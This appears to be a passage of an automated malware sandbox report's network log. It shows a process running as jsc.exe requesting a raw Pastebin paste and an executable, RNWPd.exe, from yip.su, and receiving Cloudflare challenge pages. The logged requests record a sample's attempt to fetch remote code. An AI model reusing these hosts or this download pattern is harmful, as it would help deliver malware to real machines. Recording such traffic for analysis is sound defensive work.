                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:09:21 UTC679INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 42 4f 4a 50 79 72 6c 45 65 4e 6f 4b 6f 4f 73 50 62 61 54 79 45 77 6a 34 54 65 4b 46 4f 51 76 6d 49 31 42 74 71 6b 49 53 48 74 62 57 49 59 6e 7a 37 53 51 43 59 42 62 4a 58 4b 75 45 35 34 41 49 4e 67 78 79 6c 66 64 6f 57 30 35 76 65 6d 76 49 47 50 49 72 75 4c 2f 2f 36 42 68 4c 42 43 49 4f 6c 39 67 47 4e 50 75 42 4e 7a 77 3d 24 56 4d 5a 2b 79 43 44 6e 39 4e 71 72 4e 34 34 30 58 46 36 4c 4c 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: BOJPyrlEeNoKoOsPbaTyEwj4TeKFOQvmI1BtqkISHtbWIYnz7SQCYBbJXKuE54AINgxylfdoW05vemvIGPIruL//6BhLBCIOl9gGNPuBNzw=$VMZ+yCDn9NqrN440XF6LLw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:09:21 UTC1369INData Raw: 33 64 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3de7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:09:21 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:09:21 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:09:21 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:09:21 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:09:21 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:09:21 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:09:21 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 37 32 30 30 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 63 65 61 30 66 39 33 63 34 35 37 27 2c 63 48 61 73 68 3a 20 27 65 37 31 36 61 62 63 31 31 61 65 66 33 32 36 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 52 45 31 38 36 6c 66 52 56 4a 57 57 4c 5f 41 39 39 65 38 57 44 32 64 75 47 6f 4e 58 34 48 6c 78 5f 41 66 73 57 7a 43 57 38 61 45 2d 31 37 32 33 39 33 32 35 36 30 2d 30 2e 30 2e 31 2e 31 2d 34 31 31 36 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '37200',cRay: '8b4cfcea0f93c457',cHash: 'e716abc11aef326',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=RE186lfRVJWWL_A99e8WD2duGoNX4Hlx_AfsWzCW8aE-1723932560-0.0.1.1-4116",cFPWv: 'g',cTTim
                                    2024-08-17 22:09:21 UTC1369INData Raw: 50 34 50 65 5a 51 2e 34 31 46 2e 61 32 45 30 64 6b 66 46 58 31 59 78 4d 36 6c 4c 43 32 2e 58 32 5a 48 39 46 70 67 65 48 50 2e 38 7a 57 4b 48 66 55 4d 41 74 76 50 31 6a 6c 41 4e 71 6c 7a 6e 6c 77 75 69 49 52 63 49 33 6b 4d 33 36 33 79 6e 52 6e 44 61 59 73 58 5f 32 41 2e 54 44 6d 64 43 7a 49 6c 57 55 35 79 61 32 45 5f 41 54 5a 4b 59 35 49 73 36 7a 34 48 74 47 76 43 34 57 6a 61 79 4e 49 7a 70 45 65 30 62 79 73 6e 2e 37 72 59 6d 4e 65 71 67 59 72 37 32 64 4a 61 77 32 69 7a 7a 38 77 2e 5a 43 66 33 42 6d 69 50 50 6c 63 34 35 63 72 4b 30 34 61 76 5a 4b 4b 7a 6c 57 37 39 79 48 46 51 49 68 44 6d 6f 30 52 52 4a 56 32 77 50 4d 55 66 75 5a 38 71 52 65 67 53 78 72 64 59 46 39 5a 54 4d 79 62 46 42 65 48 38 69 55 72 38 7a 48 59 67 53 52 74 43 79 2e 71 61 58 67 33 5a 6a
                                    Data Ascii: P4PeZQ.41F.a2E0dkfFX1YxM6lLC2.X2ZH9FpgeHP.8zWKHfUMAtvP1jlANqlznlwuiIRcI3kM363ynRnDaYsX_2A.TDmdCzIlWU5ya2E_ATZKY5Is6z4HtGvC4WjayNIzpEe0bysn.7rYmNeqgYr72dJaw2izz8w.ZCf3BmiPPlc45crK04avZKKzlW79yHFQIhDmo0RRJV2wPMUfuZ8qRegSxrdYF9ZTMybFBeH8iUr8zHYgSRtCy.qaXg3Zj


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    28192.168.2.549752104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:26 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:26 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:09:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfd0b0f274370-EWR
                                    2024-08-17 22:09:26 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:09:26 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:09:26 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:09:26 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    29192.168.2.549753188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:26 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:26 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:09:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:09:26 UTC681INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4a 71 6c 59 35 2b 49 73 79 62 75 6a 53 4b 55 49 32 64 44 39 69 56 55 61 4c 74 43 69 38 35 6d 55 33 49 4b 51 70 44 34 4c 69 77 54 6b 35 2f 6c 36 75 52 53 75 5a 39 62 30 70 32 75 34 42 70 36 34 63 42 6d 49 74 70 30 2f 43 7a 4e 74 5a 4c 72 6a 75 75 78 35 76 66 57 4a 4a 37 4e 48 44 54 72 4f 2f 4d 68 4d 5a 38 6d 6e 73 73 51 3d 24 30 78 67 4a 6b 4c 6c 32 5a 2b 6a 6b 78 36 4b 75 37 45 79 56 46 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: JqlY5+IsybujSKUI2dD9iVUaLtCi85mU3IKQpD4LiwTk5/l6uRSuZ9b0p2u4Bp64cBmItp0/CzNtZLrjuux5vfWJJ7NHDTrO/MhMZ8mnssQ=$0xgJkLl2Z+jkx6Ku7EyVFg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:09:26 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:09:26 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
